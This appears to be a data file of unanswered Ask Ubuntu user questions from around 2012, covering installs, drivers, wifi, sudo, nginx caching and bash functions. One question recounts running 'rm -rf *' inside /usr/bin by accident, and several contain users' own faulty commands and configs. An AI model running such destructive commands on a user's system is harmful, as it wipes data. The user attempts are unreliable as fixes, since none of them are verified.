191826	nemo replaces nautilus on unity and gnome shell session after i installed latest version of cinnamon	i installed the latest version of cinnamon on ubuntu 12.04 and now nemo replaces nautilus when i choose unity or gnome shell session . when i start unity i have to restart the session for 3-4 times to restore nautilus , on the contrary when i choose gnome shell nautilus never works , it remains nemo . is there a way to have nemo only on cinnamon session and not on unity and gnome shell too or the only solution is to remove cinnamon ? many thanks in advance
191829	/ folder permissions	i 've changed / folder owner from root to administrator account . now no sudo commands are working . it used to show sudoers are in mode 04666 it should b in the mode 04000 then i did something and it is showing `` sudo : must be setuid root '' help me out
191831	upgrade from 9.04 to 12	i am unable to install anything higher than ubuntu 9.04 on a computer , i can not explain why , i have tried the live cd 's for all the versions down from 12.04 and the only one that will boot up is version 9.04 . consequently , i would like to move up from this download to version 12.04 but i can not because the repositories are no longer supported . and yes i have tried booting with live cd 's , i have tried with usb , i have tried changing the bios , i have tried all the options that they say in the troubleshooting menu , please ... there is something different between the versions though , the 12.04 version i just get a black screen with a cursor , while the other versions i get some text talking about something called pxe-2.1 adaptor , something pxe2.1 exiting and then windows starting up once more ( and yes i have checked to see if the cd/usb was made correctly ) . so back to my original question ; how do i move from version 9.04 to version 12.04 using update manager right now ... thanks this seems weird sudo apt-get install update-manager-core [ sudo ] password for lin : reading package lists ... done building dependency tree reading state information ... done update-manager-core is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how can it be the newest version , there must be something wrong so now i have started to add the repositories for different versions of ubuntu and it is upgrading to 9.10 , which is a good start , so i think i just have to keep adding the repositories and trying to upgrade ... is there any other help that anybody can give me ? ? ? ?
191835	starcraft ii on wine - ubuntu 12.04	i know this might seem like a repeat question , but i 've literally looked over 100 threads on how to get sc2 to work on ubuntu 12.04 through wine and none have worked . i downloaded wine new today , and inserted my purchased sc2 disk . when i try to open the installer ( installer.exe ) with wine , an error appear saying : '' no installer data could be found . if this problem persists , please contact blizzard technical support . '' i searched for solutions to mediate this issue and was directed to the following source : http : //ubuntuforums.org/showthread.php ? t=1435314 . i followed directions through until i got to ls i tried various combinations of ( ls installer.exe , ls'/home/rothic/desktop/installer.exe , etc . ) all come back with `` no such file or directory '' . im not sure what to do , the next step would be to replace the `` starcraft_installer '' with the starcraft installer file , which im not sure how to do ( very new to linux ) . i tried wineprefix=~/.wine_starcraft/ wine starcraft_installer and it says `` wine : can not find l '' c : \windows\system32\starcraft_installer.exe '' despite it being on the desktop as advised . any suggestions on where to go from here ?
191836	wpa_supplicants connection issues	im trying to connect to my wireless router but not having any luck . could someone give me a few pointers ? skay @ raspberrypi ~ $ sudo wpa_supplicant -iwlan0 -c/etc/wpa_supplica/wpa_supplicant.conf rfkill : can not open rfkill control device ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument wlan0 : trying to associate with xx : xx : xx : xx : xx : xx ( ssid='cerberus ' freq=2462 mhz ) wlan0 : associated with 00:00:00:00:00:00 wlan0 : ctrl-event-disconnected bssid=xx : xx : xx : xx : xx : xx reason=0 this is my wpa_supplicants config : ctrl_interface=dir=/var/run/wpa_supplicant group=netdev update_config=1 ap_scan=1 network= { ssid= '' cerberus '' # psk= '' xxxxxx '' psk=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }
191841	i have errors when trying to install ubuntu on msi gt70 onc	i 'm trying to install ubuntu 12.04.1 64bit on a msi gt70 onc . i have a problem when i install it . i get an error ( dev/ ... something missing i think ) i 'm then put into a screen that is like the terminal . i know i 'm not installing the server version . i have tried re-downloading and installing the 12.04.1 64bit by putting it on a cd . it works when i run it in virtualbox in windows . error : udevd [ 149 ] : inotify_add_watch ( 6 , /dev/dm-1 , 10 ) failed : no such file or directory gave up waiting for root device , common problems : - boot args ( cat /proc/cmdline ) - check rootdelay ( did the system wait long engough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; is /dev ) alert ! /dev/disk/by-uuid/0e358b9f-1738-4362-a86e-08e80d34d245 does not exist , dropping to a shell ! budybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) _
191843	will my nginx reverse proxy cache work ?	i have a website running nginx and apache apache deals with php files , and nginx the html static files we have now changed the site so there are no html static files , only php files and this has heavy load on the server , so i wanted to put the nginx as a reverse proxy cache , so that the php files coming from apache will be cached and delivered static ... can anyone with expertise let me know if the following will work or what i need to change ? ... proxy_cache_path /var/www/cache levels=1:2 keys_zone=my-cache:8m max_size=1000m inactive=600m ; proxy_temp_path /var/www/cache/tmp ; # # the default server # server { listen 80 ; client_max_body_size 100m ; server_name 71.72.73.745 domain.com www.domain.com ; # access_log logs/host.access.log main ; location / { root /var/www/html/domain ; index index.html index.htm index.php ; location ~* \ . ( jpg|jpeg|gif|png|ico|js|css ) $ { log_not_found off ; expires 180d ; proxy_pass http : //127.0.0.1:8080 ; proxy_cache my-cache ; proxy_cache_valid 200 302 60m ; proxy_cache_valid 404 1m ; } } # redirect server error pages to the static page /50x.html # error_page 500 502 503 504 = @ apache ; # location = /50x.html { # root /usr/share/nginx/html ; # } # php goes to apache location ~ \.php $ { proxy_pass http : //127.0.0.1:8080 ; proxy_set_header x-real-ip $ remote_addr ; proxy_set_header host $ host ; proxy_set_header x-forwarded-for $ proxy_add_x_forwarded_for ; proxy_cache my-cache ; proxy_cache_valid 200 302 60m ; proxy_cache_valid 404 1m ; } error_page 404 = @ apache ; error_page 405 = @ apache ; location @ apache { proxy_pass http : //127.0.0.1:8080 ; proxy_set_header x-real-ip $ remote_addr ; proxy_set_header host $ host ; proxy_set_header x-forwarded-for $ proxy_add_x_forwarded_for ; } # deny access to .htaccess files , if apache 's document root # concurs with nginx 's one # location ~ /\.ht { deny all ; } } ... please do let me know if the above in my nginx.conf file will work for making all php files taken from apache to become cached via nginx and delivered as static files , thus reducing server load ! if not , what should i change ? thanks , aku .
191847	why am i getting gwibber notifications without gwibber installed ?	i removed gwibber as soon as i installed ubuntu . i used gwibber on another ubuntu computer , and did n't like it . i did n't mind the notifications from gwibber when i got new @ replies , but i just installed hotot , and like it a lot . but , i am getting notifications from hotot and gwibber , even though i dont have gwibber installed , and havent for months . how can i fix/get rid of this ?
191849	how to use existing partition in preseeded installation ?	i have a machine with 4 partitions : sda1 - root sda2 - swap sda3 - tmp sda4 - documents when i run the installation i do n't want to repartition the disk . now i read on http : //www.debian.org/releases/stable/i386/apbs01.html.en that it is not possible to use existing partitions . if i ca n't , what do i have to state in the preseed file if i want to keep the sda4 partition because it contains personal data of the users ? any ideas ?
191850	sudo dpkg error - blank line in value of field 'maintainer '	i am running on ubuntu 12.04 lts and am trying to install nx . when using a sudo dpkg command for the plugin ( nxplugin_3.5.0-6_i386.deb ) i get an error . i have tried a number of things . other packages seemed to work but not this one . i have looked around quite a bit and it sounds like it might have something to do with the /var/lib/dpkg/status file but all i see in line 6 of that is : maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > here is the error : sudo dpkg -i nxplugin_3.5.0-6_i386.deb dpkg : error processing nxplugin_3.5.0-6_i386.deb ( -- install ) : parsing file '/var/lib/dpkg/tmp.ci/control ' near line 6 package 'nxplugin ' : blank line in value of field 'maintainer' errors were encountered while processing : nxplugin_3.5.0-6_i386.deb any help is appreciated . thanks , jeff
191852	error : invalid environment block . press any key to continue	error : invalid environment block . press any key to continue ... the error message appears immediately after the boot screen on purple background . ubuntu 12.04.1 lts .
191855	windows 8 with wubi	i am installing ubuntu with the windows installer , however , i am using windows 8 . i need to know if there will be problems with installing it using windows 8 , and i need to know which installation size i should use ? 4gb , 18gb , etc . also , is it possible to actually install it on a usb drive ? the option was available in the installation , but i was not sure if it was safe or not . i would really appreciate some answers .
191862	hdio get identity failed for dev/sdb invalid argument	this failure is on an external hard drive connected by usb . however , it worked flawlessly for several days . then , one day when i tried to start ubuntu there appeared a debian splash screen with grub menu . when i selected the appropriated boot item from menu screen goes black and the above mention error appeared and never finished the boot process . process hung there . i have read and reread all the forum topics on this subject . all i really find is discussion about it may be this and may be that , but no fixes . found one `` work around '' that did not work . someone must know what to do about this . the suggestions about what it might be does n't help . system wo n't boot and even if the suggestions were accurate , still no mention of how to correct the problem . can anyone help ?
191864	right mouse button doesnt work	i have installed ubuntu 12.04.1 on my new lenovo ideapad y580 m772dge . unfortunately the right mouse button of the touchpad is not working correctly . every mouse button click is interpreted as a left mouse button click . i tried to uninstall and reinstall the synaptics ( xserver-xorg-input-synaptics ) drivers , but the problem is still present . what else can i do ? any other suggestions ? is it possible to emulate a right mouse click event with a keyboard key ?
191866	installing firefox 15 and remove previous version ( ubuntu 12.04 )	hello i am new in linux so please forgive my question : i would like to know how can i update firefox 14 to firefox 15 and how to remove the previous version .
191871	wubi installer stuck at expanding	i am trying to install ubuntu 12.04 on windows 7 . after running the wubi installer it downloaded the files but now the setup is just showing expanding and its been over 2 hours . any solution ?
191872	how to get root terminal ? also i have a problem a wrong character appears instead of @	dual boot windows/ubuntu . in ubuntu , i can not write the character ' @ ' . when i try to do so , another character appears , so can not email ! tried another keyboard , same problem - both are fine in windows . can not access a `` root '' terminal . searched for file menu.lst but can not access it ( in order to change default boot system ) . please help . ( running ubuntu 10.04 lts / windows xp )
191875	netbeans and svn	i 'm running ubuntu 12.04 . i installed netbeans 7.0.1 and subversion 1.16.17 , both from the repositories . when i click on team-subversion-checkout nothing happens . when i enter the path to executable /usr/bin in tools-options-misc-versioning-subversion and click ok , the checkout still doesnt work . when i reenter the options menu the path is not there . seems like it isnt saved .
191876	upgrading from 10.04 to 12.04.1 stuck at downloading python-qt4	i am a java programmer and i consider myself a linux newbie . so i could use a little help here . i am trying to update my ubuntu from version 10.04 to 12.04.1 ( lts ) . the downloading start and runs at around 10mb/s until i am somewhere near 26 % and the speed just drops to 0 . i figured i could use the command do-release-update so i could see what it was doing . again the same occurred : the downloading got stuck on 26 % at http : //nl.archive.ubuntu.com/ubuntu/ precise/main python-qt4 1386 4.9.1-2ubuntu1 . it says it downloaded 41 % of that file/package . it also tries another wget on the same file every x seconds . help ?
191885	google chrome with gnome	i 've used windows for a long time , and i 'm used to that maximize , minimize and close buttons are on the upper right corner of a window . i fixed that in gnome . but , it does n't affect google chrome . is there any way to fix that ? i use gnome 3.4.2.1 in ubuntu 12.04 .
191889	is there a gui app to setup and toggle hostapd ?	title says it all , i 've tried wifi-hostapd-app but i always run into trouble while installing one of its dependencies , dnsmasq specifically . i read one of the workarounds is to disable ubuntu 's network manager , i 'd rather not do that .
191890	how do i log into bash shell only ?	on my home desktop i want to use ubuntu unity sometimes and just the bash shell ( without any gui ) other times . is it possible to set up a login option where i can choose between using the unity gui or just the shell ? for example , on the ubuntu login screen i can choose among unity , gnome shell , xfce , etc . an option there for just the bash shell command line would be ideal . i 'm not trying to invite `` why would you do that '' debate here . i have my reasons .
191893	how can i get color panel icons in lubuntu 12.04 ?	how do i get all color panel icons in lubuntu 12.04 ? i have tried changing the `` look and feel '' and the openbox settings , but there does n't seem to be any way to get all color panel icons .
191894	my bash function runs only once per terminal opened	when i try to run my bash function , defined in .bashrc , for a second time in the same terminal , it does n't work . the code is the following : function nos ( ) { local option while getopts cs option do case $ option in s ) # start my server ; ; c ) local cdir= '' ~/mydirectory '' local cdir_arg= '' '' case $ optarg in p ) local cdir_arg= '' anotherdirectory '' ; ; esac local cdir= '' $ { cdir } $ { cdir_arg } '' cd $ cdir ; ; * ) echo 'this function doesnt have super cow powers' return 1 ; ; esac done } i run this : nos -c it goes to ~/mydirectory ok , worked . but then i do this : cd ~ nos -c and nothing happens .
191897	will all dash input in 12.10 be sent to amazon ?	it seems like all user input to the dash home lens is send to amazon by default in ubuntu 12.10 , is this correct ?
191901	home folder quicklist not showing quicklist on right click unless it 's open	this just started happening , i go to right click the home folder icon to get to my video folder , and it just says open new window home folder unlock from launcher but when i click on the home folder it shows the quick list . i do n't know why it 's not working .
191902	how to boot ubuntu from my sd card	i want to try ubuntu , so i put it on my sd card 32 card . but i ca n't figure out how to boot from my sd card from my boot menu . my sdcard usb drive is too outdated i got in 2005 and it only support sc not sdhc my sd card is a class 6 32 gb sdhc . and my computer is a dell inspiron n7110 . please help me .
191904	error while looking for updates	everytime i try to check for new updates , i always get this error message : w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/pmcenery/ppa/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and i get a message telling me to check my internet connection , i am connected via wifi to internet . what 's the problem ?
191909	is there anyway i can use mac os 9 on ubuntu ?	is there something in virtual box i can use or a different virtual system altogether , or even a dual-boot with ubuntu 12.04 and mac os 9 . i have thousands of dollars worth of software that can only be used in mac os 9 . any help would be greatly appreciated ! ! !
191914	how should i configure trim support for lvm logical volumes ?	i am setting up a notebook for software demo purpose . the machine has a intel core i7 cpu , 8gb ram , a 128gb ssd , and runs ubuntu 12.04 lts 64bit desktop . as it is , the ssd is configured to have a single volume group , with /boot , /swap , and / all in their respective logical volume . they collectively consume 30gb space . i plan to use the remaining for logical volumes for kvm guests , all run ubuntu 12.04 server i would like to ensure that the ssd is utilized optimally . although on this site , there are some great info about setting up trim support for file system setups that do not involve lvm , i have not found explicit guide regarding my planned setup . i did found this page which talks about adding issue_discards in /etc/lvm/lvm.conf . but in said file on my machine , i did n't find the cited content . i double-checked man lvm.conf ( 5 ) , did n't see any mentioning of this option either . thus , i 'm not sure what to do . furthermore , even say adding the option is the right thing to do , should i in my machine 's /etc/fstab still add mount options such as noatime etc ? any tips , pointers , and/or further guidance are greatly appreciated .
191917	after remove zeitgeist , there is no unity in ubuntu	because zeitgeist continuously access the hard disk , i removed zeitgeist package completely . after that , when trying to log into ubuntu , there is no more unity option , only genome , genome ( no effects ) , etc . and even genome does n't work normal . say pressing tab does n't switch window , can not open folder in the explorer . i tried to reinstall zeitgeist . the problem remains . when i run unity -- reset in genome session , the sidebar appears , the unity seems back . but if i close the command window that runs `` unity -- reset '' , the unity disappears . and i still do n't have the option to log into unity next boot . can any one help me to restore unity ? thanks .
191918	hanvon / hanwang graphics tablet not recognised	i 'm totally lost . i 've just built a new system and installed ubuntu 12.04 . it 's my first time with linux and getting into the terminal / command line for the first time since ibmdos 5 and windows 3.1 has been a steep learning curve . however , the interface works beautifully apart from it does n't recognize my hanvon artmaster am1209 . i have sent diagnostics to digimend and favux was kind enough to advise that the tablet should be using the wacom x driver as the hanvon is actually a hanwang and these should be supported . lsusb reports : id 0b57:8501 beijing hanwangtechnology co. , ltd xinput list reports : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2+usb mouse id=8 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ eee pc wmi hotkeys id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=10 [ slave keyboard ( 3 ) ] favux suggested inspecting /var/log/xorg.0.log for the tablet but i can not see any mention of it , and that is as far as i have got . i 've tried researching the problem but i am struggling with all the new terminology and the fact that i want the pc to be a means to an end and not the end in itself where i spend the rest of my days tweaking and testing rather than just using it . hope there is some help out there .
191919	new app does n't appear in unity dash	i have copied an executable in /usr/bin a program that i 'd like to use . of course i can launch it with the command line . however it does n't appear in unity when i open the dash , and i would like to add it . how is it possible ?
191938	desktop icon not vissible compiz error ?	i was updating ubuntu .meanwhile all desktop icons disappear . noting is visible . how can i recover that ? . let me know any command which restore system or solution of this problem .
191940	syntax for specifying base of logarithm in calculator	in the programming mode of gcalctool , you have a log button , which calculates the logarithm , but how do i know what base it 's using and how do i change it ? for example , how would i calculate the base 2 logarithm for 16 ?
191941	how to get amd graphics card working well 12.04 ?	fresh install of 12.04 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4200 ] 'additional drivers ' shows ati/amd proprietary fglrx graphics driver , and ati/amd proprietary fglrx graphics driver ( post-release updates ) as not installed . ati/amd proprietary fglrx graphics driver says it installs successfully when i try . the post-release updates say they fail ( and when they fail the graphics driver no longer shows as installed either ) . i did sudo apt-get install fglrx , which said it was already installed and sudo apt-get install fglrx-updates which installed something . i then restarted . amd control center is available and i can use it to get a dual monitor desktop working ( which i can not do with system settings - > displays ) . graphics performance is bad : if i click and drag on the desktop the selection rectangle can not keep up with the cursor and xorg briefly uses a lot of cpu ( observed in top ) . visiting eg youtube.com makes the chrome tab unresponsive and makes chrome use a lot of cpu scrolling in chrome is laggy . i have seen compiz using a lot of cpu in top , but it also sometimes sits at around 4 % ( still at the top of the list but ok i guess ? ) it 's at 45 % right now . i was running 12.04 in 2d desktop mode prior to this but was still having problems with eg scrolling in chrome , i was hoping a reinstall would help , but apparently not . what 's the best way to resolve this ? get a new graphics card ? try mint instead ? or is there a way to get this graphics card working happily with 12.04 ?
191942	deleted all the files in usr/bin typing in rm -rf *	i 'm new to linux and installed ubuntu 12.04 today . i accidentally deleted everything in /usr/bin typing in the command rm -rf * . i do n't know what is mounting and would like to learn but at this point i think the only way left for me is to re install everything . please let me know the ways to re install everything now . it would be of great help to me .
191953	how to restore grub when windows 7 mbr lost it ?	my dual boot desktop was running only windows 7 until it crashed on a windows update . could n't get it started again even after all the usual things that might fix it , so i installed ubuntu 12.04 , which has worked very well . unfortunately carbonite does n't run on linux yet , and so i called microsoft support to see if we could be windows 7 up and running . their attempts to get windows 7 running resulted in writing a new mbr for windows , which failed and also somehow caused the loss of ability to boot into ubuntu also . how can i get back to ubuntu ? i do n't want to lose my settings in ubuntu .
191955	oil rush will not go beyond launcher	i bought oil rush from software center . when i click on the icon from the unity launcher , it will launch the oil rush launcher , but when i click on run , it closes the launcher and seems to start , but it does n't launch anything .
191956	weak signal even if i 'm only 5 meters away from my modem	i 'm having kind of a weak signal on ubuntu , about 2 bars ( i have a laptop ) , when i go on windows it really gets quicker ( 5 bars ) . what may cause this ? my wifi worked as soon as i installed ubuntu so i did not install a network driver . according to connection informations , i am using the ath9k drivers . i can provide more informations if needed . my wifi adaptor is a atheros速 wb225 ( 802.11b/g/n ) and my bluetooth is set off . i also use a 2,4ghz wireless mouse which i have been told may cause interference ? anyway how can i fix this problem please ? here are my lspci and lsmod .
191957	i ca n't create a ntfs partition in ubuntu	when i 'm installing ubuntu 12.04 , i try to create a ntfs partition but i ca n't find it . there are fat16 , fat32 , ext ... but not ntfs .
191958	how to remove or uninstall a unity scope	i intalled the unity photo lens using this commands : sudo add-apt-repository ppa : scopes-packagers/ppa & & sudo apt-get update sudo apt-get install unity-lens-photo unity-scope-flickr unity-scope-shotwell and then downloading and executing a deb package found here . flickr scope works fine . however , the shotwell scope is not working and has caused errors in my system . the question is how can i remove or uninstall the shotwell scope or any scope without affecting others scopes or lenses ? thanks !
191959	attach keyboard/mouse to x display in dell xps l502x dual video cards ( intel/nvidia hdmi )	the idea : use a second monitor in dell xps l502x with hdmi port in ubuntu 12.04 the process : i connect the hdmi cable to monitor . i read this and i have video in hdmi monitor with bumblebee and this commands : optirun nvidia-settings -c :8 display=:8.0 firefox i have created a second keyboard/mouse master group with xinput with this solution . the problem : the second monitor ( display 8 ) does n't recognize the keyboard/mouse and i cant use it . the question : do you know some command to attach the keyboard/mouse master group to display 8 ? i think that xinput -set-cs may work but it does not .
191964	how do i know which file a program is trying to access ?	i have a program which i am trying to run , however when i run it ; it just complains that it ca n't find a particular file . however i have no idea which folder it is trying to find this particular file in . i have a copy of the required file , i just need to know which folder to copy it too . is there any way to show in real time which files are being accessed or which files are trying and failing to be accessed ? i am using ext4 filesystem if that helps . thanks
191970	my laptop can not access internet after setup bridge with wired nic and wireless nic	i setup a bridge using wired nic and wireless nic in order to make wireless nic as a wi-fi ap to share wired internet access , after setup successfully , the wi-fi ap works as my expectation , but my laptop can not access internet , please give me a hand . thanks . my hostapd.conf $ cat hostapd.conf interface=wlan0 bridge=br0 driver=nl80211 ssid=myap hw_mode=g channel=11 dtim_period=1 rts_threshold=2347 fragm_threshold=2346 macaddr_acl=0 auth_algs=3 ieee80211n=0 wpa=3 wpa_passphrase=password wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp setup steps : $ sudo killall hostapd hostapd : no process found $ sudo hostapd -b hostapd.conf configuration file : hostapd.conf using interface wlan0 with hwaddr 00:26:5e : e8:4f:8e and ssid 'myap' $ sudo brctl addbr br0 device br0 already exists ; ca n't create bridge with the same name $ sudo ifconfig eth0 0.0.0.0 up $ sudo ifconfig wlan0 0.0.0.0 up $ sudo brctl addif br0 eth0 $ sudo brctl addif br0 wlan0 device wlan0 is already a member of a bridge ; ca n't enslave it to bridge br0 . $ sudo ifconfig br0 192.168.1.110 netmask 255.255.255.0 $ sudo route add default gw 192.168.1.1 the chrome prompts : the server at stackoverflow.com ca n't be found , because the dns lookup failed . dns is the network service that translates a website 's name to its internet address . this error is most often caused by having no connection to the internet or a misconfigured network . it can also be caused by an unresponsive dns server or a firewall preventing google chrome from accessing the network . $ ping 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . ^c -- - 192.168.1.1 ping statistics -- - 64 packets transmitted , 0 received , 100 % packet loss , time 63456ms $ brctl show bridge name bridge id stp enabled interfaces br0 8000.00265ee84f8e no eth0 wlan0 $ ifconfig br0 link encap : ethernet hwaddr 00:26:5e : e8:4f:8e inet addr:192.168.1.115 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :226:5eff : fee8:4f8e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:25 errors:0 dropped:0 overruns:0 frame:0 tx packets:43 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4038 ( 4.0 kb ) tx bytes:8111 ( 8.1 kb ) eth0 link encap : ethernet hwaddr c8 : d6:5e : f8:6a:22 inet6 addr : fe80 : :cad6:5eff : fef8:6a22/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:384 errors:0 dropped:0 overruns:0 frame:0 tx packets:297 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:119746 ( 119.7 kb ) tx bytes:37055 ( 37.0 kb ) interrupt:46 base address:0x4000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:62 errors:0 dropped:0 overruns:0 frame:0 tx packets:62 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4712 ( 4.7 kb ) tx bytes:4712 ( 4.7 kb ) mon.wlan0 link encap : unspec hwaddr 00-26-5e-e8-4f-8e-30-30-00-00-00-00-00-00-00-00 up broadcast running multicast mtu:1500 metric:1 rx packets:17 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2514 ( 2.5 kb ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:26:5e : e8:4f:8e inet6 addr : fe80 : :226:5eff : fee8:4f8e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:117 errors:0 dropped:0 overruns:0 frame:0 tx packets:187 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:12139 ( 12.1 kb ) tx bytes:82155 ( 82.1 kb ) it had looked like a problem with iptables , but no .
191971	mouse permanently stuck on left side of screen	one of my two monitors is died , so while my computer was turned off i unplugged the dead monitor then turned my computer back on . when i got to the log in page i typed my password and got to the desktop my mouse was stuck to the left edge of the screen . i can move it up and down , and left and right click , but it wo n't come off the edge . i tried switching the monitor cable to the other slot to see if that would make a difference but nothing changed . if it makes a difference , i 'm using kubuntu .
191972	no sound from internal speaker but headphones ok	the problem : the system wo n't play sound on the internal speaker of the laptop , but only on the headphone . when i put the headphone jack half in and fiddle around with it , then it 'll play even on the internal speakers ( the system apparently believes , that the headphone are in ) . what should i do ? the technical data : laptop modell medion erazer x6815 $ sudo aplay -l | egrep ^card card 0 : pch [ hda intel pch ] , device 0 : alc269vb analog [ alc269vb analog ] card 0 : pch [ hda intel pch ] , device 1 : alc269vb digital [ alc269vb digital ] card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] ubuntu 12.04 64bit $ uname -a linux matatabisama-x6815 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux
191973	proxydroid for linux	http : //code.google.com/p/proxydroid/ https : //play.google.com/store/apps/details ? id=org.proxydroid i need a similar app for ubuntu/linux which acts as a `` global proxy '' for every tcp connection . is there anything already available ?
191980	how to create a bootable usb stick ?	i am looking at this : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-ubuntu i need to create a boot disk to test ubuntu to make sure it will run on a pc ( compaq mini cq10-120la ) i was given . i can create the boot disk off of a mac ( in english ) or windows ( but windows is in spanish and foreign to me ) . questions : what format do i choose for the usb stick ? ( i wish the instructions stated this ) . what is dash ? ( will i know when i run the installer ? ) can i do this from a mac or windows computer ? or only from ubuntu ?
191982	android 'wifi scanner ' for ubuntu ?	anyone with an android device can find the wifi scanner in the google play store . my question is , is there some sort of software for ubuntu that does the same or similar ? wifi-radar is not at all what i 'm looking for . i do n't really mean to use aircrack-ng or anything like that either . hell , if i could emulate or virtualmachine an android os and actually run the wifi scanner app , that would be pretty cool .
191986	why has n't ubuntu made notify-osd more configurable yet ?	first thing i fix generally on ubuntu was the notify-osd in recent releases - it really irritates me that on a dual-monitor , it shows up to the right . i just dual booted it along side kubuntu and found this still to be the case why is it that there 's been a ppa to fix/patch notify-osd for years , but it 's still not something added to notify-osd out-of-the-box ? further edit below for the daft commentary and the obvious support for it ... hopefully it 'll get a few ( constructive ) answers and less comments . i have a dual-monitor setup , 2x 24 '' 1080p monitors . when i work on the left-side of the left monitor , the notifications appear on the top right of the right-hand monitor . that 's literally outside my field of view , as my monitor is only about 1.5 ft away from my eyes , and the distance from where my focus is to where the notification appears is over 3 feet .
191987	computer is n't sensing wifi	before i installed linux , my wifi was working fine but now my computer ca n't pick up anything . any clue how to fix this ?
191991	how to configure backuppc in ubuntu 12.04 ?	i would like to setup backuppc to backup files of all remote hosts . a need guide with screenshots will be appreciated . details : all the hosts are running ubuntu , i need to set incremental backup for the files which is kept in their desktop . need to monitor backup status from server using web gui .
191992	how to allocate more ram to minecraft ?	minecraft lags badly in my linux than windows ! in windows i dont find trouble playing it ! my system specs : processor : amd athlon x2 260 3.2ghz dual core graphic card : ati radeon 3000 series ram : 4gb ( 3.25 usable ) i have ubuntu 12.04 and i want allocate more ram to minecraft ! i have 4gb physical ram ( only 3.25 usable ) i have openjdk 7 also tell me other ways to run minecraft smoothly ! please help ! ! ! ! ! ! ! ! ! ! ! !
191994	ca n't remove wine 1.4 rc5	i installed wine 1.4 rc5 . later i realised that this wine wo n't work because there is no sound . i removed it using synaptic package manager and installed wine 1.2 which is the stable version of ubuntu 10.04 . even though i install it . it 's still showing wine 1.4 rc-5 . how can i remove wine 1.4-rc5 and install wine 1.2 ?
191995	toshiba tecra a8 display resizes to 4:3 when an external display is used	i am very new to this so please excuse me if the solution is simple . i am running an old toshiba tecra a8 laptop and the screen is fine until i attach an external monitor via vga then the laptops monitor resizes itself and changes ratios to 3:4 is there a fix for this or am i out of luck ? as additional information : i have tried 3 or 4 different monitors and it happens with all of them , except that the external monitors hold the 3:4 display ration but get stretched out . feel free to add comments requesting more information if needed for a fix .
191999	how to clear bash history completely ?	i want to clear all before command from history of my server . i use history -c it seems all things are cleared but when i ssh to the server , all commands are still there . how can i clear them permanently ?
192000	12.04 upgrade hosed my system	i wish i could be more specific . i installed the upgrade from the update manager and after the computer rebooted , i found i could not run a lot of programs . i tried running them from the command line to see what errors i would get : update-manager : traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 32 , in from updatemanager.updatemanager import updatemanager file `` /usr/lib/python2.6/dist-packages/updatemanager/updatemanager.py '' , line 36 , in import apt importerror : no module named apt so i need to install python-apt , right ? : reading package lists ... building dependency tree ... reading state information ... python-apt is already the newest version . you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : amarok : depends : phonon-backend-xine but it is not installable or phonon-backend depends : libmtp8 ( > = 0.3.1 ) but it is not installable recommends : kdemultimedia-kio-plugins ( > = 4:4.2.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . [ 300+ lines omitted ] it looks like i was half way through the upgrade when something broke . apt-get -f install gives the same errors as above . i have tried a few commands from the forums all with no luck so far : apt-get install -o apt : :immediate-configure=false -f apt python-minimal ran into the same dependencies problem removing 3rd party sources from /etc/apt/sources.list these were already commented out i can run synaptic , but it tells me i have 181 broken packages . is there any hope of restoring this system ? i would rather not reinstall from cd , but it looks like i may have to .
192004	how to install .run file in 12.04 ?	hello everyone i am new in ubuntu and i really like it 's too comfortable for any h/w but i have problem in it i want to install graphic driver of nvidia geforce 610m series . i already use these command cd 'path of my removable drive' chmod -x nvidia.run sudo ./nvidia.run after run these command my terminal show sudo : ./nvidia.run : command not found please help me
